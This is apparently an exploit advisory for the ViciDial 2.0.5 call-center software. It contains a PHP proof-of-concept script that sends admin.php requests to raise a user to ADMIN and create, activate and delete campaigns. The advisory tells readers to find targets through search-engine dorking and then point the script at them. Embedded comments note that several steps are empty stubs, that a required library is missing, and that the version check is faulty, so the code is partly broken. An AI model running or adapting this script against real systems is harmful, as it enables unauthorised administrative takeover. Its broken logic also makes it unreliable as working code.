
ViciDial 2.0.5 Cross Site Request Forgery

ViciDial 2.0.5 Cross Site Request Forgery
Posted Oct 3, 2024
Authored by indoushka

ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 8d97cf3df17b56471dae55b00de7d5fdb6df05ba2d778c815ad038c1c5af4ade

ViciDial 2.0.5 Cross Site Request Forgery

=============================================================================================================================================
| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following PHP code adds a new admin. As written it sends every request directly with Basic-auth credentials rather than from a cross-site page, so what it shows is that admin.php accepts state-changing parameters without a per-request token, not a forged cross-origin submission.

[+] Line 172 sets your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )

[+] Save the code as poc.php.

[+] Usage: php poc.php

[+] PayLoad :


<?php
/**
 * Proof-of-concept client shipped with the advisory.
 *
 * Every request carries a Basic Authorization value built from the supplied
 * credentials (see __construct), so the script behaves as a directly
 * authenticated client, not as a cross-site page riding a victim's browser
 * session. What it exercises is that admin.php accepts state-changing
 * actions through plain ADD=... parameters; the forgery risk the advisory
 * names presumably lies in the absence of an anti-forgery token on those
 * forms, which this script does not itself demonstrate.
 *
 * Several steps of exploit() are empty stubs (startService,
 * updateSystemSettings, fetchPhoneCredentials, agentPortalAuthentication,
 * insertMaliciousRecording, waitForCronJob), and updateUserSettings and
 * createDummyCampaign depend on a Faker\Generator class that this file
 * neither imports nor autoloads.
 *
 * Defensive reading: the requests below are what to look for in web logs —
 * admin.php hit with ADD=4A/21/41/211/61 and a Basic Authorization header
 * from an unexpected client — and the mitigation for the advisory's claim is
 * a synchronizer token on every admin.php form, SameSite cookies, and
 * Origin/Referer checks on state-changing actions.
 */
class VICIdialExploit {
// Credentials and base URL supplied by the caller.
private $username;
private $password;
private $targetUri;
// Map of header name => value; see sendRequest() for how it is serialised.
private $headers;

/**
 * Stores credentials and base URL and pre-builds the Basic auth value that
 * every request sends.
 */
public function __construct($username, $password, $targetUri) {
$this->username = $username;
$this->password = $password;
$this->targetUri = $targetUri;
$this->headers = array(
'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)
);
}

/**
 * Version probe. Fetches /agc/vicidial.php, extracts a version string and
 * labels anything version_compare() places at or below '2.14-917a' as
 * 'Vulnerable'; returns 'Unknown' when the response code check fails or no
 * version is found.
 *
 * Note: 'code' holds the raw status line string returned by sendRequest(),
 * and the value handed to compareVersion() is the whole regex match,
 * 'VERSION:' prefix included (see extractVersion()).
 */
public function check() {
$response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');
if ($response['code'] != 200) {
return 'Unknown';
}

$version_info = $this->extractVersion($response['body']);
if (!$version_info) {
return 'Unknown';
}

$current_version = $this->compareVersion($version_info, '2.14-917a');
return ($current_version <= 0) ? 'Vulnerable' : 'Safe';
}

/**
 * Returns $matches[0] — the entire matched text, including the 'VERSION:'
 * prefix, not just the captured groups — or null when the pattern does not
 * match.
 */
private function extractVersion($html) {
preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);
return isset($matches[0]) ? $matches[0] : null;
}

/** Thin wrapper over version_compare(); returns -1, 0 or 1. */
private function compareVersion($current, $vulnerable) {
return version_compare($current, $vulnerable);
}

/**
 * Runs the advisory's steps in order. Stub methods do nothing and return
 * nothing: fetchPhoneCredentials() has no return statement, so $phoneCreds
 * is null by the time it is indexed below.
 */
public function exploit() {
$this->startService();
$this->authenticateAdmin();
$this->updateUserSettings();
$this->updateSystemSettings();
$campaignData = $this->createDummyCampaign();
$this->updateCampaignSettings($campaignData['id']);
$this->createDummyList($campaignData['list_name'], $campaignData['id']);
$phoneCreds = $this->fetchPhoneCredentials();
$this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);
$this->insertMaliciousRecording($phoneCreds['recording_extension']);
$this->deleteDummyCampaign($campaignData['id']);
$this->waitForCronJob();
}

/** Stub: empty body. */
private function startService() {
// Starting HTTP service logic
}

/**
 * Issues one HTTP request through PHP's stream wrapper.
 *
 * $method - HTTP verb placed in the stream context.
 * $url    - absolute URL to request.
 * $body   - optional array; when truthy it is form-encoded into the request
 *           content regardless of $method (deleteDummyCampaign() and
 *           authenticateAdmin() pass one with GET).
 *
 * The header string is implode()d from the values of $this->headers only.
 *
 * Returns ['code' => first element of $http_response_header, i.e. the full
 * status line string, 'body' => response body, or false on failure].
 * No error handling: a failed file_get_contents() raises a PHP warning, and
 * $http_response_header may be undefined if no HTTP response was received.
 */
private function sendRequest($method, $url, $body = null) {
$options = array(
'http' => array(
'method' => $method,
'header' => implode("\r\n", $this->headers)
)
);
if ($body) {
$options['http']['content'] = http_build_query($body);
}
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

return array(
'code' => $http_response_header[0],
'body' => $result
);
}

/**
 * GETs admin.php with ADD=3 and the username in the request content, throws
 * unless 'code' == 200 (see sendRequest() for what 'code' holds), and prints
 * a success line otherwise.
 */
private function authenticateAdmin() {
$response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));
if ($response['code'] != 200) {
throw new Exception('Failed to authenticate with credentials.');
}
echo 'Authenticated successfully as user ' . $this->username;
}

/**
 * The step the advisory title refers to: POSTs ADD=4A for the configured
 * user with user_group=ADMIN and Faker-generated name/phone fields.
 * Requires Faker\Generator, which this file does not import.
 */
private function updateUserSettings() {
$faker = new Faker\Generator();
$userSettings = array(
'ADD' => '4A',
'user' => $this->username,
'pass' => $this->password,
'full_name' => $faker->name,
'user_group' => 'ADMIN',
'phone_login' => $faker->userName,
'phone_pass' => $faker->password,
'active' => 'Y',
'vicidial_recording' => '1'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);
echo 'Updated user settings';
}

/** Stub: empty body. */
private function updateSystemSettings() {
// Fetching system settings logic and making changes
}

/**
 * POSTs ADD=21 to create a campaign with a random six-digit id (rand() is
 * not a CSPRNG; acceptable for a throwaway id, not for anything secret) and
 * a Faker-generated name. Returns name, id, list_name and list_id (= id + 1).
 * Requires Faker\Generator, which this file does not import.
 */
private function createDummyCampaign() {
$faker = new Faker\Generator();
$campaignId = rand(100000, 999999);
$listId = $campaignId + 1;
$campaignName = $faker->company;

$campaignSettings = array(
'ADD' => '21',
'campaign_id' => $campaignId,
'campaign_name' => $campaignName,
'user_group' => '---ALL---',
'active' => 'Y'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
echo 'Created dummy campaign ' . $campaignName;

return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);
}

/** POSTs ADD=41 to set the campaign active with auto_dial_level=1. */
private function updateCampaignSettings($campaignId) {
$campaignSettings = array(
'ADD' => '41',
'campaign_id' => $campaignId,
'active' => 'Y',
'auto_dial_level' => '1'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
echo 'Updated dummy campaign settings';
}

/** POSTs ADD=211 to create a list attached to $campaignId. */
private function createDummyList($listName, $campaignId) {
$listSettings = array(
'ADD' => '211',
'list_name' => $listName,
'campaign_id' => $campaignId,
'active' => 'Y'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);
echo 'Created dummy list ' . $listName;
}

/** Stub: empty body, no return value. */
private function fetchPhoneCredentials() {
// Fetching phone credentials logic
}

/** Stub: empty body. */
private function agentPortalAuthentication($extension, $password, $campaignId) {
// Agent portal authentication logic
}

/** Stub: empty body. */
private function insertMaliciousRecording($recordingExtension) {
// Inserting malicious recording logic
}

/**
 * Sends ADD=61 with CoNfIrM=YES as a GET whose parameters go into the
 * request content (see sendRequest()).
 */
private function deleteDummyCampaign($campaignId) {
$this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));
echo 'Deleted dummy campaign ' . $campaignId;
}

/** Stub: empty body. */
private function waitForCronJob() {
// Waiting for cron job logic
}
}

// Usage example (the advisory says to edit the target here). The result of
// check() is not inspected, so exploit() runs whatever the version probe
// reports.
$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');
$exploit->check();
$exploit->exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
